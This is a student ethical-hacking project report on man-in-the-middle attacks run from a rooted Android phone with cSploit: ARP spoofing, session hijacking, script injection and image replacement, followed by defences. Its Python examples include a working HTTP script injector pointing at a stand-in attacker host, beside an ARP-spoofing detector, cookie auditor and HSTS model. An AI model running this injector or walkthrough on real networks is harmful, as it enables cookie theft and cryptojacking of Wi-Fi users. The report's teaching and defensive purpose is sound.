MITM with Android device


Certified Ethical Hacking Professional


Indian Cyber Security Solutions


Project report


[MITM with Android device]


Author: Priyam Harsh

(Under guidance of Pritam Sir)




  1. Introduction
  2. Demonstration
  3. Prevention
  4. Conclusion


Introduction


According to Wikipedia, in cryptography and computer security a man-in-the-middle attack (MITM) is an attack where the attacker secretly relays, and possibly alters, the communication between two parties who believe they are communicating directly with each other. One example of a MITM is active eavesdropping, in which the attacker makes independent connections with the victims and relays messages between them, making them believe they are talking directly to each other over a private connection when in fact the entire conversation is controlled by the attacker. The attacker must be able to intercept all relevant messages passing between the two victims and inject new ones. This is straightforward in many circumstances; for example, an attacker within reception range of an unencrypted wireless access point (Wi-Fi) can insert themselves as a man in the middle.

Now I will demonstrate a MITM attack using a rooted Android phone. Since Android is a Linux-based operating system, it can do much of what a Linux machine can do. So, without wasting a moment, let's dive right in.



Requirements

  • Rooted Android phone
  • An unencrypted access point (an open Wi-Fi network)
  • cSploit app

First of all, we will understand how a MITM attack works. Take an example: Alice and Bob are having a conversation; Eve wants to eavesdrop on the conversation while remaining invisible. Eve could tell Alice that she is Bob and tell Bob that she is Alice. This leads Alice to believe she is speaking to Bob, while actually revealing her part of the conversation to Eve. Eve can then gather information from it, alter the response, and pass the message along to Bob (who thinks he is talking to Alice). As a result, Eve transparently hijacks their conversation. This is how MITM works. On a Wi-Fi network the attacker plays Eve between the victim and the access point: it poisons the victim's ARP cache so that the gateway's IP address resolves to the attacker's MAC address (and usually poisons the gateway's cache in the same way), so every packet the victim sends to the internet, and every reply coming back, passes through the attacker's device first. From that position the attacker can mount any kind of MITM attack, such as session hijacking, script injection, website redirection and so on.
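The ARP cache poisoning just described is also the easiest thing to detect from the victim's side, because the poisoned reply contradicts what the network said earlier. The following is an added example written for this report, not code from cSploit or from the original text: it parses raw Ethernet/ARP frames and raises an alert the moment a second MAC address claims an IP address that was already seen with a different one. The addresses and the three sample frames are constructed for the demo; on a real Linux host the frames would come from a raw packet socket instead.

```python
import struct

# Wire formats: 14-byte Ethernet header, 28-byte ARP packet (IPv4 over Ethernet).
ETH_HDR = struct.Struct("!6s6sH")          # dst MAC, src MAC, EtherType
ARP_PKT = struct.Struct("!HHBBH6s4s6s4s")  # htype, ptype, hlen, plen, op, sha, spa, tha, tpa
ETHERTYPE_ARP = 0x0806
ARP_REPLY = 2


def mac_bytes(s): return bytes(int(x, 16) for x in s.split(":"))
def ip_bytes(s): return bytes(int(x) for x in s.split("."))
def mac_str(b): return ":".join(f"{x:02x}" for x in b)
def ip_str(b): return ".".join(str(x) for x in b)


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Construct an Ethernet frame carrying an ARP reply (only used to make sample traffic here)."""
    eth = ETH_HDR.pack(mac_bytes(target_mac), mac_bytes(sender_mac), ETHERTYPE_ARP)
    arp = ARP_PKT.pack(1, 0x0800, 6, 4, ARP_REPLY,
                       mac_bytes(sender_mac), ip_bytes(sender_ip),
                       mac_bytes(target_mac), ip_bytes(target_ip))
    return eth + arp


def parse_arp(frame):
    """Return the ARP fields of a frame as a dict, or None if it is not IPv4-over-Ethernet ARP."""
    if len(frame) < ETH_HDR.size + ARP_PKT.size:
        return None
    _dst, src, ethertype = ETH_HDR.unpack_from(frame, 0)
    if ethertype != ETHERTYPE_ARP:
        return None
    htype, ptype, hlen, plen, op, sha, spa, tha, tpa = ARP_PKT.unpack_from(frame, ETH_HDR.size)
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {"op": op, "sha": mac_str(sha), "spa": ip_str(spa),
            "tha": mac_str(tha), "tpa": ip_str(tpa), "eth_src": mac_str(src)}


class ArpWatch:
    """Remember the first MAC seen for each IP and flag any reply that contradicts it."""

    def __init__(self):
        self.table = {}    # ip -> mac first seen claiming it
        self.alerts = []

    def observe(self, frame):
        p = parse_arp(frame)
        if p is None or p["op"] != ARP_REPLY:
            return None
        if p["eth_src"] != p["sha"]:
            # A reply whose Ethernet source and ARP sender address disagree is forged or relayed.
            return self._alert(f"{p['spa']}: ARP sender {p['sha']} differs from frame source {p['eth_src']}")
        known = self.table.setdefault(p["spa"], p["sha"])
        if known != p["sha"]:
            return self._alert(f"{p['spa']} moved from {known} to {p['sha']} (possible ARP spoofing)")
        return None

    def _alert(self, msg):
        self.alerts.append(msg)
        return msg


# Constructed sample traffic (hypothetical addresses): the real gateway answers first,
# then a phone on the same Wi-Fi claims the gateway's IP with its own MAC.
GATEWAY_IP, GATEWAY_MAC = "192.168.1.1", "aa:bb:cc:00:00:01"
VICTIM_IP, VICTIM_MAC = "192.168.1.20", "aa:bb:cc:00:00:20"
PHONE_MAC = "de:ad:be:ef:00:99"
SAMPLE_FRAMES = [
    build_arp_reply(GATEWAY_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP),  # legitimate
    build_arp_reply(GATEWAY_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP),  # legitimate, repeated
    build_arp_reply(PHONE_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP),    # poisoning reply
]


def run_sample():
    """Feed the sample frames through the watcher and return the alerts raised."""
    watch = ArpWatch()
    for frame in SAMPLE_FRAMES:
        watch.observe(frame)
    return watch.alerts


if __name__ == "__main__":
    for alert in run_sample():
        print("ALERT:", alert)
```

To run this against live traffic on Linux, open `socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(0x0003))` as root and pass each `recv(65535)` result to `ArpWatch.observe`. The check is a heuristic: a router that is legitimately replaced trips it too, which is why a static ARP entry for the gateway is the stronger fix on a host you control.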


MITM using Android


So now I will demonstrate some MITM attacks using an Android device. To start, we join an open Wi-Fi network: it requires no credentials to connect, and traffic on it is not encrypted at the link layer, so anything sent over plain HTTP can be read and modified by anyone on the same network. (The ARP spoofing that the attacks below rely on also works on a password-protected network once the attacker is a member of it; the open network just lowers the bar to joining.) Once connected, we start the cSploit app. cSploit was designed for penetration testing and security research. It is quite a powerful tool and can also cause damage if used with wrong intentions.

As soon as we open the cSploit app, automatic network discovery starts and all connected clients are displayed on the screen. It has also started gathering information by port scanning every client on the Wi-Fi network. Since we are concerned with man-in-the-middle attacks, we select a single victim, or we can select the whole subnet to attack every client at once.

I have selected a client on the Wi-Fi network to be the victim of the attacks. Once the target client(s) are selected, we are presented with several options including Trace Route, Port Scanning, Service Inspector, Exploit Finder and so on. Now we select the MITM option.

After selecting the MITM option, we see all the attacks we can launch against the target: sniff traffic and passwords, spoof DNS, hijack sessions, kill the connection, redirect traffic to another website, replace images on web pages and inject a script into every web page.

Kill Connection


If we want to cut off the internet connection of a specific target, or of everyone on the network, we use the 'Kill Connection' option. As soon as the attack starts, the target loses internet connectivity. In simpler words, the attacker, being the man in the middle between the victim and the internet, drops all of the victim's outgoing and incoming packets instead of forwarding them.

Script Injection


If we want to inject a script into every web page the victim visits, we use the 'Script Injection' option. It is one of the most powerful attacks because the attacker can inject any kind of malicious script. For example, there is a JavaScript cryptocurrency miner on the market named Coinhive. This script, provided by the Coinhive website, offers another source of income for a website administrator. Any website admin can sign up for Coinhive and embed the JavaScript miner in their website. When a user visits a page embedded with the Coinhive script, the miner runs directly in their browser, mining cryptocurrency in the background using the visitor's CPU. The tool was designed as an alternative source of revenue for website admins who want to get rid of the unwanted ads taking up space on their site. The miner produces Monero, a cryptocurrency less valuable than Bitcoin but still among the top 10 in the world. Coinhive itself is a legitimate company, but its service can be abused by hackers to make quick money: they can inject the JavaScript miner into the pages of unsuspecting coffee-shop goers or any public Wi-Fi user as they browse the internet. Any hacker with a good knowledge of wireless attacks can use a man-in-the-middle position on a public hotspot to inject this script to users. Note that the injection only works on pages delivered over plain HTTP; a page served over HTTPS cannot be modified in transit without breaking the TLS connection and triggering a certificate warning in the browser.
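What the 'Script Injection' option does to a plain-HTTP response is a byte-level rewrite, and seeing it spelled out makes clear why it is so easy on HTTP and impossible on HTTPS. The following is an added example for this report, not cSploit's code: it splices a script tag into an HTTP/1.x response body and fixes the Content-Length so the victim's browser renders the whole page, while leaving non-HTML and compressed or chunked responses untouched (real tools decode those first; this demo does not). The script URL and the two sample responses are constructed for the demo. Under TLS the injector would only ever see ciphertext, so there is nothing to rewrite.

```python
import re

# Hypothetical attacker-controlled script URL (not a real host); stands in for any injected payload.
INJECTED_TAG = b'<script src="http://attacker.example/m.js"></script>'


def split_response(response):
    """Split a raw HTTP/1.x response into (status_line, header_lines, body), keeping header order."""
    head, sep, body = response.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("not a complete HTTP response head")
    status_line, *header_lines = head.split(b"\r\n")
    return status_line, header_lines, body


def header_value(header_lines, name):
    """Return the value of the first header called `name` (lower-case bytes), or None."""
    for line in header_lines:
        key, _, val = line.partition(b":")
        if key.strip().lower() == name:
            return val.strip()
    return None


def inject_script(response, script_tag=INJECTED_TAG):
    """Return the response with script_tag spliced in before </body>, or the response
    unchanged when it is not something a naive injector can safely modify."""
    status_line, header_lines, body = split_response(response)
    ctype = header_value(header_lines, b"content-type") or b""
    if not ctype.lower().startswith(b"text/html"):
        return response                       # images, JSON, scripts: leave alone
    if header_value(header_lines, b"content-encoding") or header_value(header_lines, b"transfer-encoding"):
        return response                       # gzip'd or chunked: would need decoding first
    m = re.search(rb"</body\s*>", body, re.IGNORECASE)
    new_body = body[:m.start()] + script_tag + body[m.start():] if m else body + script_tag
    # Content-Length must match the new body or the browser truncates (or stalls on) the page.
    new_headers = []
    for line in header_lines:
        if line.partition(b":")[0].strip().lower() == b"content-length":
            line = b"Content-Length: " + str(len(new_body)).encode()
        new_headers.append(line)
    return b"\r\n".join([status_line, *new_headers]) + b"\r\n\r\n" + new_body


# Constructed sample responses, as a plain-HTTP server would send them.
HTML_RESPONSE = (b"HTTP/1.1 200 OK\r\n"
                 b"Content-Type: text/html; charset=utf-8\r\n"
                 b"Content-Length: 40\r\n"
                 b"\r\n"
                 b"<html><body><h1>Hello</h1></body></html>")
JSON_RESPONSE = (b"HTTP/1.1 200 OK\r\n"
                 b"Content-Type: application/json\r\n"
                 b"Content-Length: 12\r\n"
                 b"\r\n"
                 b'{"ok": true}')


def demo():
    """Inject into the HTML response and show that the JSON one is left as it was."""
    return inject_script(HTML_RESPONSE), inject_script(JSON_RESPONSE)


if __name__ == "__main__":
    injected, untouched = demo()
    print(injected.decode())
    print("JSON untouched:", untouched == JSON_RESPONSE)
```

The Content-Length rewrite is the detail that separates a working injector from one that breaks pages, and it is also a cheap signal for a defender comparing what the server sent with what the client received.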

Session Hijacking


Session hijacking is another very powerful attack, in which the attacker listens for cookies on the network and takes over a user's session. For example, a victim logs into Flipkart with his or her credentials. The attacker sniffs the session cookie that the browser sends with each subsequent request and replays it in his own requests; the site cannot tell the two apart, so he now has full access to the victim's Flipkart account without ever learning the password.

In cSploit, whenever the target visits any website, the request and its cookies are captured automatically and we can hijack any of the sessions as needed. This only works for sites that let the session cookie travel over plain HTTP; a cookie set with the Secure attribute is never sent over HTTP and cannot be sniffed this way.
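Whether the sniffer in cSploit ever gets to see a session cookie is decided by the cookie's attributes, not by the attacker. The following added example (written for this report, not part of cSploit or the original text) models the browser rule that matters here: a cookie without `Secure` rides on any http:// request to the host, a cookie with it only on https://. It also audits a Set-Cookie header the way a reviewer would. The host name and token are hypothetical, and the model deliberately ignores Path, Domain and expiry.

```python
from urllib.parse import urlsplit


def parse_set_cookie(header):
    """Parse one Set-Cookie header value into its name, value and the attributes that matter here."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    cookie = {"name": name.strip(), "value": value.strip(),
              "secure": False, "httponly": False, "samesite": None}
    for attr in parts[1:]:
        key, _, val = attr.partition("=")
        key = key.strip().lower()
        if key == "secure":
            cookie["secure"] = True
        elif key == "httponly":
            cookie["httponly"] = True
        elif key == "samesite":
            cookie["samesite"] = val.strip().lower() or None
    return cookie


def audit_set_cookie(header):
    """Return the weaknesses a MITM-minded reviewer would flag on a session cookie."""
    c = parse_set_cookie(header)
    findings = []
    if not c["secure"]:
        findings.append("missing Secure: sent over plain HTTP, where a LAN sniffer can capture it")
    if not c["httponly"]:
        findings.append("missing HttpOnly: an injected script can read it via document.cookie")
    if c["samesite"] is None:
        findings.append("missing SameSite: cross-site requests carry it too")
    return findings


class CookieJar:
    """Minimal model of the browser rule that decides which cookies ride on a request."""

    def __init__(self):
        self.cookies = {}   # (host, name) -> parsed cookie

    def store(self, host, set_cookie_header):
        c = parse_set_cookie(set_cookie_header)
        self.cookies[(host, c["name"])] = c

    def cookie_header_for(self, url):
        u = urlsplit(url)
        secure_channel = u.scheme == "https"
        sent = [f"{c['name']}={c['value']}"
                for (host, _), c in self.cookies.items()
                if host == u.hostname and (secure_channel or not c["secure"])]
        return "; ".join(sent)


# Constructed examples (hypothetical host and token): the same session cookie as a careless
# site and as a careful site would set it after login.
HOST = "shop.example"
WEAK_COOKIE = "session=7f3a9c1e; Path=/"
STRONG_COOKIE = "session=7f3a9c1e; Path=/; Secure; HttpOnly; SameSite=Lax"


def what_the_sniffer_sees(set_cookie_header):
    """Cookie header a browser would put on a later http:// request to the same host,
    i.e. exactly what a LAN sniffer can capture and replay."""
    jar = CookieJar()
    jar.store(HOST, set_cookie_header)
    return jar.cookie_header_for(f"http://{HOST}/account")


if __name__ == "__main__":
    for label, hdr in (("weak", WEAK_COOKIE), ("strong", STRONG_COOKIE)):
        print(label, "->", repr(what_the_sniffer_sees(hdr)), audit_set_cookie(hdr))
```

The weak cookie leaks even from a site that serves its pages over HTTPS, because a single http:// link, image or redirect is enough to make the browser send it in the clear; the Secure attribute is what closes that door.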

Replace Images


In this attack, whenever the target opens any website, every image on the page is replaced with an image chosen by the attacker. Once the replace-image attack is selected in cSploit, we are prompted to pick a local image or a web URL for the image. After selecting the image, the attack starts.

There are a bunch of other attacks too. Used in the wrong way, this can really damage the privacy and the data of any person.





Prevention


Strong WPA2/WPA3 Encryption on Access Points

Having a strong encryption mechanism on wireless access points prevents unwanted users from joining your network just by being nearby. A weak or broken mechanism, such as WEP, or WPA2 with a guessable pre-shared key, can allow an attacker to brute-force his way into the network and begin man-in-the-middle attacking. The stronger the encryption implementation, the safer it is going to be. Note that encryption on the access point only keeps outsiders off the network: anyone who is already a legitimate member (every customer on a coffee-shop Wi-Fi, for instance) can still ARP-spoof the other clients. Enabling client isolation on the access point, so that clients can only talk to the gateway and not to each other, blocks that.


Virtual Private Network

A VPN gives the device's traffic an encrypted tunnel to a trusted endpoint outside the local network. The tunnel is set up with key-based authentication and encrypted between the device and the VPN server, so even if an attacker is on the same shared network and holds a man-in-the-middle position, all he sees is encrypted VPN packets; he cannot read or alter what is inside them.


HTTPS

HTTPS carries HTTP inside a TLS connection: the server proves its identity with a certificate, a session key is agreed using public-key cryptography, and everything after that is encrypted and integrity-protected. An attacker sniffing the traffic gets nothing useful from it, and cannot inject scripts or swap images without breaking the connection. Websites should only use HTTPS, not offer an HTTP alternative, and send a Strict-Transport-Security (HSTS) header so that browsers refuse to fall back to HTTP on later visits. Users can install browser plugins that force HTTPS on every request.
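The HSTS header is what turns "the site offers HTTPS" into "the browser will not use HTTP for this site", which is the property that defeats the injection and sniffing attacks above on a hostile Wi-Fi. The following added example (written for this report, not taken from any browser's source) models the cache a browser keeps: it parses the header, honours max-age expiry, includeSubDomains and the max-age=0 unregister case, and decides whether an http:// URL must be upgraded. The host and timestamps are constructed.

```python
from urllib.parse import urlsplit


def parse_hsts(header):
    """Parse a Strict-Transport-Security value into (max_age, include_subdomains);
    max_age is None when the header is absent or malformed and must be ignored."""
    max_age, include_sub = None, False
    for directive in header.split(";"):
        key, _, val = directive.strip().partition("=")
        key = key.lower()
        if key == "max-age":
            try:
                max_age = int(val.strip().strip('"'))
            except ValueError:
                return None, False
        elif key == "includesubdomains":
            include_sub = True
    return max_age, include_sub


class HstsCache:
    """Remember which hosts have asked to be HTTPS-only and for how long, as a browser does."""

    def __init__(self):
        self.entries = {}   # host -> (expires_at, include_subdomains)

    def learn(self, host, header, now):
        """Record a header received over HTTPS. A header seen over plain HTTP must be ignored
        (an attacker could forge it), so callers only pass headers from TLS responses."""
        max_age, include_sub = parse_hsts(header)
        if max_age is None:
            return
        if max_age == 0:
            self.entries.pop(host, None)      # max-age=0 is the defined way to unregister
            return
        self.entries[host] = (now + max_age, include_sub)

    def should_upgrade(self, url, now):
        """True if the browser must rewrite this http:// URL to https:// before sending it."""
        u = urlsplit(url)
        if u.scheme != "http" or not u.hostname:
            return False
        host = u.hostname
        for known, (expires_at, include_sub) in self.entries.items():
            if now >= expires_at:
                continue
            if host == known or (include_sub and host.endswith("." + known)):
                return True
        return False


# Constructed scenario with a hypothetical host: the user visited the site over HTTPS once
# (at t=0), then later follows plain http:// links while on an attacker's Wi-Fi.
HOST = "shop.example"
ONE_YEAR = 31536000
HSTS_HEADER = f"max-age={ONE_YEAR}; includeSubDomains"


def demo_upgrades(now):
    """Which of three later http:// requests the browser refuses to send in the clear."""
    cache = HstsCache()
    cache.learn(HOST, HSTS_HEADER, now=0)
    return {
        "same host": cache.should_upgrade("http://shop.example/login", now),
        "subdomain": cache.should_upgrade("http://api.shop.example/v1", now),
        "other site": cache.should_upgrade("http://other.example/", now),
    }


if __name__ == "__main__":
    print(demo_upgrades(now=10))
    print(demo_upgrades(now=ONE_YEAR + 1))   # policy expired: back to plain HTTP
```

The model also shows the protocol's known gap: the very first visit, before any header has been learned, still goes out over HTTP if the user types a bare hostname, which is why browsers ship a preload list of hosts that are HSTS from the start.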


Public Key Pair Based Authentication

Man-in-the-middle attacks typically involve spoofing something or other. Public-key-based authentication, such as RSA or ECDSA signatures, can be used at various layers of the stack (TLS certificates, SSH host keys, signed DNS records) to verify that the things you are communicating with are actually the things you want to be communicating with. Pinning a server's public key in a mobile app goes one step further and rejects even a certificate issued by a compromised or coerced certificate authority.


Conclusion


In conclusion, I would like to say that the cyber world is developing every day, and so are cyber-attacks. With every new advancement in technology there comes a new bug, new vulnerabilities and new exploits ready to be misused. After getting my training for C|EHP, I can now say that I am one of those amazing people whose job is to find these bugs and vulnerabilities and to create a hack-proof environment for everyone.


Thank you for your attention.